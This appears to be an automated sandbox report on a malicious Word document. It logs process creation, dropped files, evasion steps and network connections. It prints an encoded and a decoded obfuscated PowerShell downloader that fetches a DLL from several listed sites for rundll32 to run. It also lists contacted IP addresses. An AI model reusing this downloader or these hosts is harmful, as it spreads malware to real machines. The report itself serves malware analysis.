                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAdgAgACAAUABCADUAbwAgACAAKABbAFQAWQBwAEUAXQAoACIAewAyAH0AewAxAH0AewA1AH0AewAzAH0AewAwAH0AewA2AH0AewA0AH0AIgAgAC0ARgAgACcAVAAnACwAJwBFAE0ALgBJACcALAAnAFMAWQBzAFQAJwAsACcAZQBDACcALAAnAHkAJwAsACcAbwAuAEQASQBSACcALAAnAE8AUgAnACkAIAApACAAOwAgACAAUwBFAHQALQBJAFQARQBtACAAdgBBAFIASQBhAEIATABlADoAbQA3AGEAOQAgACgAWwB0AHkAcABFAF0AKAAiAHsANAB9AHsAMgB9AHsAMwB9AHsANQB9AHsAMQB9AHsANgB9AHsAMAB9AHsANwB9ACIAIAAtAGYAJwBuACcALAAnAEkAQwBFAHAATwBJAE4AdABtACcALAAnAG4AZQBUACcALAAnAC4AJwAsACcAcwB5AFMAdABlAE0ALgAnACwAJwBzAEUAUgB2ACcALAAnAEEAJwAsACcAYQBHAGUAcgAnACkAIAApACAAIAA7ACAAIAAkAEkAaAB2ADgAOQBfAGcAPQAkAE0AOQAxAEcAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAEgAMgAzAEQAOwAkAEQAOQA0AE0APQAoACgAJwBQADcAJwArACcAMgAnACkAKwAnAFgAJwApADsAIAAoAGcARQBUAC0AdgBhAHIAaQBhAEIAbABlACAAcABiADUAbwAgAC0AVgBBACkAOgA6ACIAYwByAEUAYQBUAGUAZABpAGAAUgBlAEMAdABgAG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwA5AGsAJwArACcAdABOAGsAJwApACsAJwAyACcAKwAnAGQAJwArACgAJwB1AGgAYgA5ACcAKwAnAGsAdAAnACsAJwBHAHgAbABoACcAKQArACgAJwA5AGkAJwArACcAYQA5AGsAdAAnACkAKQAuACIAcgBFAGAAUABsAGEAQwBlACIAKAAoACcAOQAnACsAJwBrAHQAJwApACwAJwBcACcAKQApACkAOwAkAEoAOAA3AEgAPQAoACcAUwAnACsAKAAnADMANgAnACsAJwBOACcAKQApADsAIAAoACAAIAB2AGEAUgBJAGEAYgBsAGUAIAAgAE0ANwBhADkAIAAgAC0AVgBBACAAIAApADoAOgAiAFMARQBjAHUAcgBpAFQAWQBwAGAAUgBvAFQAbwBDAGAAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABYADIAMgBVAD0AKAAnAEUAJwArACgAJwBfACcAKwAnAF8ARQAnACkAKQA7ACQAUAAyADcAcABxAGUAMwAgAD0AIAAoACcARQA2ACcAKwAnAF8AUgAnACkAOwAkAEYAMwA5AEwAPQAoACgAJwBRACcAKwAnADkANAAnACkAKwAnAFcAJwApADsAJABBAGQAMQByAGEAOABuAD0AJABIAE8ATQBFACsAKAAoACgAJwBLAGkAJwArACcAbQAnACkAKwAoACcATgBrADIAZAAnACsAJwB1AGgAYgAnACkAKwAnAEsAaQAnACsAJwBtACcAKwAoACcARwB4ACcAKwAnAGwAJwApACsAJwBoADkAJwArACgAJwBpACcAKwAnAGEASwBpACcAKQArACcAbQAnACkALQBSAGUAUABsAGEAYwBlACgAWwBDAEgAQQBSAF0ANwA1ACsAWwBDAEgAQQBSAF0AMQAwADUAKwBbAEMASABBAFIAXQAxADAAOQApACwAWwBDAEgAQQBSAF0AOQAyACkAKwAkAFAAMgA3AHAAcQBlADMAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFYAMgA4AFUAPQAoACcAQwA4ACcAKwAnADgASwAnACkAOwAkAE0AcgBpAHEAZAA1ADkAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABLAHcAMwA3ADkANAB4AD0AKAAnAHgAIAAnACsAJwBbACcAKwAoACcAIABzAGgAJwArACcAIAAnACkAKwAoACcAYgAnACsAJwA6AC8ALwBjAGEAYgAuAG0AeQAnACsAJwBrAGYAJwApACsAJwBuAC4AJwArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACcAYQAnACsAKAAnAGQAJwArACcAbQBpAG4AJwApACsAJwAvACcAKwAoACcAWAAvACcAKwAnACEAJwApACsAJwB4ACcAKwAoACcAIAAnACsAJwBbACAAcwAnACkAKwAnAGgAJwArACgAJwAgAGIAJwArACcAOgAnACkAKwAoACcALwAnACsAJwAvAGIAaABhACcAKQArACcAawAnACsAJwB0AGkAJwArACgAJwB2AHIAaQBuAGQAJwArACcALgAnACsAJwBjAG8AbQAvAGMAJwApACsAJwBnACcAKwAoACcAaQAnACsAJwAtAGIAaQBuACcAKQArACgAJwAvACcAKwAnAEoAQgBiAGIAJwArACcAOAAnACsAJwAvACEAeAAgAFsAIAAnACkAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKQArACgAJwAvACcAKwAnAC8AdgBhAG4AJwArACcAZABkAG4AYQAnACkAKwAoACcAYgBoAGEAcgBnACcAKwAnAGEAJwApACsAJwB2AGUAJwArACgAJwAuAGMAJwArACcAbwAnACkAKwAoACcAbQAvAGEAcwBzACcAKwAnAGUAdAAnACkAKwAnAC8AVwAnACsAKAAnADkAbwAnACsAJwAvAC
                      Source: E6_R.dll.5.drStatic PE information: real checksum: 0x5c618 should be: 0x609ad
                      Source: E6_R.dll.5.drStatic PE information: section name: .text4
                      Source: E6_R.dll.5.drStatic PE information: section name: .text8
                      Source: E6_R.dll.5.drStatic PE information: section name: .text7
                      Source: E6_R.dll.5.drStatic PE information: section name: .text6
                      Source: E6_R.dll.5.drStatic PE information: section name: .text5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0016FED0 push edx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00151155 push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001521EC pushad ; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00153391 push eax; iretd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00150C18 pushfd ; retf
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001517A1 push ds; iretd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0018FED0 push edx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00171155 push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001721EC pushad ; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00173391 push eax; iretd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00170C18 pushfd ; retf
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001717A1 push ds; iretd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001EFED0 push edx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001D1155 push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001D21EC pushad ; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001D3391 push eax; iretd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001D0C18 pushfd ; retf
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001D17A1 push ds; iretd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001AFED0 push edx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00191155 push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001921EC pushad ; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00193391 push eax; iretd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00190C18 pushfd ; retf
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001917A1 push ds; iretd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001DFED0 push edx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001C1155 push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001C21EC pushad ; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001C3391 push eax; iretd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001C0C18 pushfd ; retf
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001C17A1 push ds; iretd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0019FED0 push edx; ret

                      Persistence and Installation Behavior:

                      barindex
                      Creates processes via WMIShow sources
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\rundll32.exePE file moved: C:\Windows\SysWOW64\Agilzgamuljjdwml\mwfcqgtqrgsdamx.pjvJump to behavior

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Agilzgamuljjdwml\mwfcqgtqrgsdamx.pjv:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Obbeicpozdckojlb\bhzpo.yca:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Bpqpm\gwvn.lsl:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Upjyf\ffrm.rmq:Zone.Identifier read attributes | delete
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2312Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                      Source: powershell.exe, 00000005.00000002.2091542862.00000000003F5000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000A823 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory protected: page execute read | page guard

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 195.159.28.230 144
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 69.38.130.14 80
                      Encrypted powershell cmdline option foundShow sources
                      Source: unknownProcess created: Base64 decoded Sv PB5o ([TYpE]("{2}{1}{5}{3}{0}{6}{4}" -F 'T','EM.I','SYsT','eC','y','o.DIR','OR') ) ; SEt-ITEm vARIaBLe:m7a9 ([typE]("{4}{2}{3}{5}{1}{6}{0}{7}" -f'n','ICEpOINtm','neT','.','sySteM.','sERv','A','aGer') ) ; $Ihv89_g=$M91G + [char](33) + $H23D;$D94M=(('P7'+'2')+'X'); (gET-variaBle pb5o -VA)::"crEaTedi`ReCt`oRY"($HOME + ((('9k'+'tNk')+'2'+'d'+('uhb9'+'kt'+'Gxlh')+('9i'+'a9kt'))."rE`PlaCe"(('9'+'kt'),'\')));$J87H=('S'+('36'+'N')); ( vaRIable M7a9 -VA )::"SEcuriTYp`RoToC`oL" = (('Tl'+'s')+'12');$X22U=('E'+('_'+'_E'));$P27pqe3 = ('E6'+'_R');$F39L=(('Q'+'94')+'W');$Ad1ra8n=$HOME+((('Ki'+'m')+('Nk2d'+'uhb')+'Ki'+'m'+('Gx'+'l')+'h9'+('i'+'aKi')+'m')-RePlace([CHAR]75+[CHAR]105+[CHAR]109),[CHAR]92)+$P27pqe3+'.d' + 'll';$V28U=('C8'+'8K');$Mriqd59='h' + 'tt' + 'p';$Kw3794x=('x '+'['+(' sh'+' ')+('b'+'://cab.my'+'kf')+'n.'+('com'+'/')+'a'+('d'+'min')+'/'+('X/'+'!')+'x'+(' '+'[ s')+'h'+(' b'+':')+('/'+'/bha')+'k'+'ti'+('vrind'+'.'+'com/c')+'g'+('i'+'-bin')+('/'+'JBbb'+'8'+'/!x [ ')+'sh'+(' b'+':')+('/'+'/van'+'ddna')+('bharg'+'a')+'ve'+('.c'+'o')+('m/ass'+'et')+'/W'+('9o'+'/')+'!'+'x '+'[ '+('s'+'h ')+('b:'+'/')+('/ie-'+'b'+'e')+('s'+'t.n')+'e'+('t/o'+'n'+'lin')+'e'+('-'+'timer'+'-')+('k'+'vh')+('xz'+'/i')+'l'+('X'+'L/!x')+(' [ s'+'h ')+('b:'+'/')+'/'+'g'+('oc'+'p'+'hon')+('gth'+'e')+('.com/'+'wp'+'-')+'co'+'nt'+('ent/'+'l')+'M'+('MC'+'/!')+('x '+'[ s')+('h'+' b://'+'ww')+'w'+('.l'+'e')+('t'+'sc')+'om'+'pa'+('r'+'eon')+('l'+'in')+('e'+'.c')+('om/d'+'e')+('.l'+'et')+'sc'+'
